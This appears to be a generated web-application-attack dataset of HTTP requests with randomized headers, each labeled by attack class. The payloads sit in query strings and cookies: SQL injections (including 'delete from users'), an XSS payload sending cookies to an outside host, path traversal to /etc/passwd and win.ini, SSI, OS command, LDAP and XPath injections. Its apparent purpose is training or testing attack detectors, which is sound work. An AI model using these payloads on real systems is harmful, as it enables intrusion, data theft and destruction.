Accept-Encoding: deflate;q=0.5
Accept-Language: toSos1mh-il, eiLch7a-Nekiipb2, poqoazs-pI;q=0.6, tN4o-o1b
Cache-Control: no-cache
Client-ip: 118.106.166.150
Cookie: eEamfRiuea=rye;Yb=ecmd;etKYn=85882759;NgxunionfwyrFu=r0nrtoabuamx;y6Pdl=eps;V2Kselect_f=in
Cookie2: $Version="36"
Date: Wed, 08 Feb 06 09:45:07 GMT
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: we7o1cGs@2OwoTmtOk.com
If-Modified-Since: Mon, 07 Mar 05 10:29:26 GMT
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: "sCDkRMtwilDfh0feU6"
If-Range: *
Max-Forwards: 94
MIME-Version: 4.9
Pragma: i=o5fs
Proxy-Authorization: Basic dHJ4ZTg4OmlvRnM=
Authorization: NTLM YTJpZDNid25nYnNybm9ueWk0RWVQMUl5YXQzbDlmUjU=
Range: 7-,-18566
Referer: http://www.96ao.cz/lroI6e/lwls/urdfceeq/Devaa.jpeg
TE: chunked,gzip
Trailer: If-Match
User-Agent: Mozilla/6.0 (Machintosh; U; PPC 6.8; ng-ei; rv:5.8.9) Gecko/40181537
UA-CPU: MIPS
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: deflate
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47574
Start - Id: 35457
class: SqlInjection
POST /SHLfol72/btenscau1ooudhaatett.shtml? HTTP/1.0
Content-Length: 168
Content-Language: r2sjah
Content-Encoding: compress
Content-Location: http://www.sBrNTi5.ch/enaeeoo/aeoo/legt.asp
Content-MD5: ZXZpN2Nhbk51cm9BZTFjdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Mar 05 11:09:36 GMT
Last-Modified: Thu, 05 Apr 07 15:16:53 UTC
Host: 179.66.213.141
Connection: tepyDeoc
Accept: audio/*, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: compress
Accept-Language: *;q=0.6
Cache-Control: max-stale=7
Client-ip: 158.176.162.21
Cookie: 1upsT='   );   delete    from    users;    commit;  dummy( ';iframeTKIG=stdinosiid%ajT2dprocessing-instructionEoed4oie;LjCL6= w;me5eE7iilr=aSedCexechavingt
Cookie2: $Version="04"
Date: Mon, 08 Dec 08 03:02:16 CET
ETag: W/"kgfzCGf9Ieg0ahhFaoq"
Expect: 100-continue
From: tei5hii@n1eSgnOlr.cz
If-Modified-Since: Wed, 24 Sep 08 02:22:55 GMT
If-Unmodified-Since: Tue, 14 Aug 07 18:16:23 GMT
If-Match: "WPkQVk3bBc77@z1Pt"
If-None-Match: "dWSNYbimQUEdoEUj2Fcv"
If-Range: Wed, 03 Sep 08 07:42:46 CET
Max-Forwards: 70
MIME-Version: 6.7
Pragma: rt8i5nh='Uhi'
Authorization: Basic SXZ3V3Q6eWxvZ2M=
Range: 351-,-07897,-78
Referer: http://www.iilnchy.cz/msj6iRnN/uon9acta/RgjasEt.mpeg
Trailer: Expect
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 3.3; nm-0m; rv:5.3.6) Gecko/09298480
UA-CPU: MIPS
UA-OS: Win95
UA-Color: color32
Via: aSn/9.3 184.69.154.2:9, HTTP/0.3 213.70.18.241, FTP/7.4 www.omsmdl2i.htm
Transfer-Encoding: deflate
X-Forwarded-For: 173.40.203.72

osHOax=4221131&Eyn5emot=4&tahktef=4908069&aesanfes=e&_tC6S=26&05ZV5oU=updateWysusraev|/larAe&6dimokaeb8Ci=em0ymsioDipsmStx7e&Gp.f5zwp-V=A3o3hxformrcpobodyslsgxtermo

End - Id: 35457
Start - Id: 47772
class: XSS
GET /bSP/cdzpei4/ei2ktmdieahliseolue/l6shasc9E/da9ne9oQt7eetc/epks8BmhcFZ9_M2/sdhfnaxenrn34tinLin/39m/ran3/T6R9cGjracfaetrca/tt.cfm?IesieAm=seE%3Fsms&tdoedteatrVt=613101&o1Clnreflth8=752573&hxtohhnttt=i5AE42g&_wWRzqZyfwAr=E9hnf&Te=%3Cxml+id+++%3D++++%22+++X+%22++%3E%3Ca%3E%3Cb+++%3E%26lt%3Bscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.toto.com%2Fcgi-bin%2Forgechnd.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+%3E%3C%2Fa+%3E%3C%2Fxml++%3E&jEhttpsXGGR=u%25lTzals&NDg9E=d4ysn&eDQ91IeX=sGgs&Zk_FmetaajTid=906645&eiuo6rhhn=+ahen2x3e&csocqre=ejn&ceiohen=aogf&eujdoree7t9o=%7C7A&aas2l=8625861 HTTP/1.1
Host: 228.211.29.81
Connection: 7era
Accept: text/xml, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.90.227.252
Cookie: 2elc=dcw
Cookie2: $Version="49"
Date: Sun, 14 Jun 09 15:59:45 CET
ETag: W/"Nxww7jHnVW6-iC@KeH"
Expect: nhsE=jgeiwe
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 13 Dec 07 07:07:06 GMT
If-Match: "58voER346VsT_GDZiHbx"
If-None-Match: "_LTYl-8m2v@24aemBkx"
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 67
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 2672-661117
Referer: /iteth/itnl/h6prUe/f7da.pl
TE: chunked,deflate;q=0.4,deflate
Trailer: Transfer-Encoding
User-Agent: hdhhhusnz/2.7.0.9
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 7.2 207.14.74.135:97267, 9.7 www.2NslS.htm:551, 2.4 www.tatmu.tiff
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 631 www.kssI.html "8aanadrIs23e" "Sun, 29 Oct 06 08:10:03 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47772
Start - Id: 45526
class: PathTransversal
GET /uyfdensth2o/cVsiIorEwp-n/nsttpaaysir5Ngh/02wTMXqpY/bEvh3lQmaBV/iuRhioPaesyoR4aton/6optgJ4CWxuSscriptPM/tcyfTg9bvnTrnbask/hhUofoA8Q9/Ie45olity/Ysadcrea0rmrecg.png?ufHe79nhegoehie=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&Az=rl+sznerL+ar&soptphpSyMv=mahr&Sroviaqlnxt2t2=etLabsa HTTP/1.0
Host: www.sxo8uial7i.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987, x-mac-chinesetrad;q=0.2
Accept-Encoding: identity;q=0.5, identity;q=0.7, deflate
Accept-Language: sqdp9ai3-eZ2a, re-r1Et;q=0.8, aqU3rsve-s
Cache-Control: no-store
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="34"
Date: Tue, 22 Feb 05 07:27:21 UTC
ETag: W/"wFLK5UzYD3@eO._7"
Expect: 100-continue
From: aFhd@iesknmut3c.net
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Fri, 10 Oct 08 03:40:36 CET
If-Match: "DaM@T@RYiLDJ4ejjayJ"
If-None-Match: "2xpFUXM0tsl_AHRt9t"
If-Range: "3n3uC.-P2wspN5e.7"
Max-Forwards: 594
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: /taeln5d/hdtgitn/1ll0co.php
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: nxocuo (tZKS-.f; nSNBfqz)
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 9.5 239.83.237.158, 8.0 www.mYLq.png:21, 0.1 www.atNsadle.js
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45526
Start - Id: 49315
class: XPathInjection
GET /1_lju@b1vlxyaxpq/ny/sL9te/oaynRdveooes/jfei2gtteiiscr.mspx?asshDarm87ye=gn%28trcpM0%27s+c&nw5Ic=e.KRDAC&toyflYtxeai=6161880&08ahSHtjnsicdr=56&e8=100696958&gJhbody=h-NW4o_.O5&lldMmvs=wsamfoo%29aReg&OeL5e=22525822&LWfromHgX=87612&sociu6iEb1=t2zdsiocz&eoeTes5=3&vatAt=peecaDe%27++or+%28i++%3C++count%28ny%2Fchild%3A%3Atext%28%29%29+and+++++j+++++%3C++count%28smsi%2Fchild%3A%3Acomment%28%29%29++++and++++k+%3C++++count%28oo%2Fchild%3A%3A*%29+++%29++++or+++%27hHi58iil%27++%3D++++%27+++++Iidmoaa%27+++or&fli=uhrh07ieodgeanay HTTP/1.1
Host: 60.186.180.48
Connection: aojtee1
Accept: video/mpeg;q=0.8, video/*;q=0.5
Accept-Charset: windows-1251;q=0.5, us-ascii;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: thsrdrwa-s;q=0.9, og-t, u-aWeants;q=0.0, 3s-4Wjd, lzphesa-tgseq;q=0.6
Cache-Control: max-stale
Client-ip: 19.197.54.208
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Sat, 06 Nov 04 22:58:37 CET
ETag: "QJH5BDGLKbNm42tiWHF"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Fri, 03 Sep 04 17:15:53 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Nov 05 04:26:47 CET
Max-Forwards: 062
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: /eans/pied9sqc/herit6/xa1ghnm.php4
TE: deflate;q=0.5
Trailer: Upgrade
User-Agent: Mozilla/7.9 (X11; U; Linux i586 3.5; fE-nl; rv:7.0.0) Gecko/13600548
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: dni/4.9 184.216.170.59, FTP/3.4 www.eath.jpg
Transfer-Encoding: a0Am4i; Netb=lhtnof
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49315
Start - Id: 39804
class: SSI
GET /kNR21jctXOE8f/bP/y5.V/tWAWuJNhIGfg/e.processing-instructionprocessing-instructionpMixtermf/jZKZKJNQ0UKYD/4D9A/necgenat/GeT3Jd/elu9hEtMJb4d.lZQJ2/4j9NoeM_.htm?aosuiesyttfEa=metano%2Foxtermzep2&anznamenlt=%3C%21--+%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&BNXhlSbagcopyJ=%29deletelOanb7+%28Pie&trnhuherrfae=0642800&piEn3iwRas=ntexecYpypedn&nenlkNnt=weXnpWm&O3etcb7=ae+xmlnnG%7Cam1A6I HTTP/1.0
Host: 87.176.187.3
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: a04aot-rrntKhnl;q=0.6, 0-8o, srophteo-rt1c
Cache-Control: mwzej7yk='dfhbnin'
Client-ip: 88.15.240.28
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="64"
Date: Thu, 14 Oct 04 08:42:41 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: dNlo
From: bny0t2@rj5o.gov
If-Modified-Since: Thu, 22 Jun 06 16:10:24 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Mon, 06 Apr 09 20:56:03 GMT
Max-Forwards: 5348
MIME-Version: 1.9
Pragma: rw3leUg=iose0
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Basic bzRhZzpIazdSdGFpaA==
Range: 2975-
Referer: http://www.s7irefnE.gov/nporrrA/a5umij/Oft8e9ks.fgf
TE: trailers,gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 1.7; xe-ls; rv:3.6.4) Gecko/62526729
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/4.3 www.geBiqrHi.tiff, 5.5 49.157.254.236
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 167 www.de7acs.shtml "1i93" "Sun, 27 Dec 09 10:08:59 UTC"
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39804
Start - Id: 35432
class: SqlInjection
GET /tnP48/puuehlmavte0aoh/sMFHg/tarwH0Hv9h/nhdtcasolaoOi9o/st2eohe9iu6me7/6ixGN_zppvlqlj/ctsashofigRgLh/MteSetuiktr/7M.php4?orX-ae=var7rbindonainsertecE&HTr8EjPhtaccesYlocationn=980026&9fatnph=R0eeya&sefserrpmro3N=%27UNIONALLSELECTfieldFROMalesasseWHERE%27%27%3D+%27&UIaGf=2misioe&CV.2perlkcZ.replacef=610756&ronuadViejs=ltmttg4ed&asiiAdszu9N2t5r=e&aztntgOlhmnde=97908&4tthai=+%7Eo%25&catCEUnetcat=ecopyne&slo0e1kjIok=nomesnNa4pIof&ntleinrfrshasn=kpieid&ArlO=71&dtHSo2towealreE=937181041 HTTP/1.0
Host: 199.83.35.224
Connection: otTb036n
Accept: text/html;q=0.6
Accept-Charset: windows-1253;q=0.3, macintosh, iso-8859-6
Accept-Encoding: *
Accept-Language: or-Tc;q=0.4, hiin5soe-hoNptPs;q=0.5, et0avs-wo5wiln
Cache-Control: ethInse='n'
Client-ip: 251.7.125.194
Cookie: tReH=d2YqD;wbeae=27680106;2ln=9156;rswutu6aeatiyl=uslsadaHoncivUlNti
Cookie2: $Version="8"
Date: Wed, 06 Aug 08 24:01:08 GMT
ETag: W/"HFxe_V9toQg18oq"
Expect: 100-continue
From: wgttuate@lrahn.uk
If-Modified-Since: Sun, 17 Aug 08 16:18:47 UTC
If-Unmodified-Since: Thu, 06 Aug 09 15:31:01 CET
If-Match: *
If-None-Match: *
If-Range: "MBL9u-wPoHk@_oir"
Max-Forwards: 016
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Basic bzJoa21naWU6YUdudHlt
Range: 1117-95,491-
Referer: http://www.jrga0.it/isud/irurh/leyeec/aPik.nsf
TE: deflate;q=0.7,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/8.0 (compatible; Konqueror/0.8; SunOS sun4u; CbzOsitaws)
UA-CPU: x86
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4231x7309
Via: ufo1i5/7.0 www.otrh.jpg
Transfer-Encoding: compress
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35432
Start - Id: 35956
class: PathTransversal
GET /rg3otEanc9cos4/m9tpB3qzhW/gpUX_pq98xY.dll?umhhotpHcdlHaP=144429&rfrqsedoshNuio=ggzx&_zJ6Qy=ceuLtsi%29o+&dRbsI=edMCkEM&tst7H0Rnhte=ltayeheeeteitef0o&gkrapaRlE=845046&geBfEdn=rostyleo%40%2Bom&sBgl=tDUeL7U1.l.U HTTP/1.0
Host: www.nisensen.org:32
Connection: keep-alive
Accept: audio/x-wav;q=0.1, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Client-ip: 160.64.233.206
Cookie: adisHt=423331;ti=5eereetcfetyi;nitRymer=iUq6ONLJw0;cuvre6mawibto=wNiip91hnptwo
Date: Fri, 15 Dec 06 19:57:24 GMT
Expect: eeRs=ah4rd6Re;hHiat=hnO6t
If-Modified-Since: Mon, 23 Nov 09 14:21:20 GMT
If-Unmodified-Since: Mon, 09 Jan 06 07:17:10 GMT
If-Match: "h-@rY-5ac96kTzn"
Max-Forwards: 8
Referer: /em0Cbrle/nlee3/i3tso/ollhrE.dll
TE: trailers
User-Agent: \WINNT\system.ini
Via: 8.8 www.OnsTjbbo.jpg:40, stt0ne/5.2 www.19ykoh.png, 8.3 www.ilhztb.css
Transfer-Encoding: identity

null

End - Id: 35956
Start - Id: 41940
class: SqlInjection
GET /K4ZsjKa/e_47zX0Q/vg3iwilreesn/u_M4/ixN907XYnAs.dll?yerhtihrkda=956&qQ_HlikeQYftpuF7P=69&fsYdeleteY-m=o9u&ar=e%3F+%26&bToaxfiw3nr=ce6%2B&ar=pitperlrq+%2Fa+%3EZ&tnml4gEaelaezce=taitxsttsliUjv&o6segntQsr=iapV&6ctav=OR+++%27hbcnamsin%27++%3D+N%27+%27 HTTP/1.0
Host: 162.146.157.65
Connection: close
Accept: video/*, text/plain;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 148.203.206.38
Cookie: a.iIVI=dprm]einsert;ha=snjr - hossauIkuvbscript a;emo2hmov0sl1sr=43929893;U8kd=sehaoal3Ord0hha;irIh7=997;nr9tf=1184048
Cookie2: $Version="8"
Date: Sat, 30 Apr 05 21:36:01 CET
ETag: "STLwztEysXjjA5_mC8"
Expect: anwaeesd
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Thu, 29 Apr 10 13:26:41 UTC
If-Match: *
If-None-Match: "ZIKhWNMq7Xx5Y_lINapC"
If-Range: Sun, 11 Sep 05 23:16:05 CET
Max-Forwards: 6366
MIME-Version: 4.0
Pragma: drermre='shM3'
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic dG1zRWhzOndCQWxsN3Q=
Range: 55660-
Referer: http://www.coleeur.st/keelee.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 5idR (dm7JbkL; eQzUGuiBCT; aTglXs)
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 724x022
Via: 3.6 www.tgEj.jpg, FTP/5.6 www.obacro2e.tiff
Transfer-Encoding: identity
Upgrade: sot/9.3, iin/4.4, eTa0/6.2
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41940
Start - Id: 44406
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 58.69.179.201:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ic2Wge-tanir;q=0.9, lhmr-mes77r, fna-aposn;q=0.2
Cache-Control: no-transform
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="3"
Date: Fri, 04 Aug 06 19:22:51 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: on76@weg6se.uk
If-Modified-Since: Tue, 20 Jan 04 21:03:03 CET
If-Unmodified-Since: Wed, 25 Jul 07 17:32:40 CET
If-Match: *
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: "tSAH3lz8Majy6XN"
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: 13oesor='eldwlmp'
Proxy-Authorization: Aeo2b tttu1f=oatrt
Authorization: oigi5 uil1eat=nanstcl
Range: 07334-,0929-,-17620
Referer: /Edfepd1a/Eoaos.sh
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: eTIY.Im http://www.nItoi5e0.net
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44406
Start - Id: 37023
class: LdapInjection
GET /aearnb/tuaahcadejosanu/tenzwnahI0n3a/69I/sru/agewwnt5onr/tyMySVF/DYQpDSchildC/elhr3l3gshz7Iz1rocp/cphCeitilhde4ichah/drti9o0r8gi98iesafs/1DcopyN.cgi?F2Il2DDoRAw=3rerT&SbhakeeIhwqauo=npe%29%28%26%28objectClass+++%3Doihf*%29&ba=tr+ie2M&teaitr=789&IMnHohian=92856&actNrasgWoOsl=03&rkutitNvN=eelJnreplace+Y%3D+e&a4v=e&En0aMJiframeOimgf6=otetniudefh5zedb1&not2fzxea=holehc HTTP/1.0
Host: 244.0.104.232
Connection: keep-alive
Accept: video/mpeg, application/postscript;q=0.7, text/*;q=0.3
Accept-Charset: koi8-r;q=0.0, koi8-r
Accept-Encoding: compress;q=0.3, identity, deflate;q=0.8, gzip;q=0.0, identity
Accept-Language: *;q=0.2
Cache-Control: d=h
Client-ip: 35.224.123.165
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="984"
Date: Tue, 01 Apr 08 21:13:12 GMT
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Mon, 02 Apr 07 05:03:52 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: "PjMCy9uX2V1dI80Lu.E"
If-Range: "Wk1lLHqcpzEConC"
Max-Forwards: 31
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 00177-,0-7679,-82265
Referer: /nyemIie.jpg
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: isoaw1n (uHhnFJE; aQxkTe; sOe.kc7)
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 0.7 204.253.165.17
Transfer-Encoding: identity
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37023
Start - Id: 45135
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.uiei.de:46
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8-r, euc-tw;q=0.7, iso-8859-15, windows-874;q=0.0
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale=55395
Client-ip: 175.81.181.89
Cookie: seIs8e=r7i;jhlawur= ?vhuoq[;ieoettiaate=44
Cookie2: $Version="6"
Date: Sat, 08 Apr 06 12:24:32 GMT
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Feb 09 01:03:48 UTC
Max-Forwards: 27
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: rdof oroo=sjr5ntl
Range: -3,456-488022
Referer: http://www.ndsneuNl.com/stspS/Lwr88s.pdf
TE: trailers,trailers
Trailer: Host
User-Agent: s0Rw/5.7.3.1.4
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: 3.0 108.65.25.139:63, 4.4 251.119.173.108, FTP/8.1 228.211.131.56
Transfer-Encoding: xnrmir
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45135
Start - Id: 46207
class: PathTransversal
GET /dC8XWl/nGTNn6qLODn9vXfmeY/nxW@Y/tZK8w0X.asmx?mNtmddnga=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: www.ceedrhw.be
Connection: close
Accept: audio/x-wav;q=0.6, text/html;q=0.2
Accept-Charset: cp-950;q=0.5, koi8-r, euc-kr;q=0.6, x-mac-chinesetrad, ks_c_5601-1987
Accept-Encoding: deflate;q=0.6, deflate, compress, deflate, gzip;q=0.0
Accept-Language: gS6i-s, 57-h3y;q=0.6, m-ircmhnq, dsfbd8hA-bpceld2
Cache-Control: min-fresh=40
Client-ip: 197.240.64.76
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="72"
Date: Mon, 26 Oct 09 20:39:56 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Wed, 08 Apr 09 19:57:27 UTC
If-Match: *
If-None-Match: *
If-Range: "zqUu0-3EU3ISXYcO"
Max-Forwards: 73
MIME-Version: 5.5
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest algorithm=MD5-sess
Range: 684-,-674552,060-
Referer: http://onjac.st/ehee5te/a2ernieg/ehtotna/9h5pr.html
TE: deflate,deflate;q=0.3
Trailer: Date
User-Agent: vece/1.6
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9556x4656
Via: FTP/1.0 www.Iet8h9.tiff
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46207
Start - Id: 37442
class: LdapInjection
GET /pt16TY.sh?72Ki2e=rre+Rc0gsaAe&4api7Numjq8sht=iusr%3Cie&afiteL=ayowek7%40et%245oqe&0t3t=18833147&lraDoeehTflz7j=oi1sexil&n22oisnrawrr=nhavingie&mbsynO1la=fromqameaexecbftun%3F&ioxo=1856314&aor=clV&rdhlh=pnaftoiH&ldmbzeHuo=6561845416 HTTP/1.0
Host: www.in1r.ch
Connection: close
Accept: text/*;q=0.3, image/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 128.88.34.144
Cookie: tyeo=698;andzstdinYMXinNBawperl=)   (| (  cn=*o'brien*  )(mail =*o   'brien* )   ;2o8IaOtoaynem=wiuos;lrrI2nfairskRyf=NaqRwp-seata
Cookie2: $Version="3"
Date: Tue, 31 Jan 06 17:12:39 UTC
ETag: W/"WpU9xYc0G9Xt.0Hni"
Expect: 100-continue
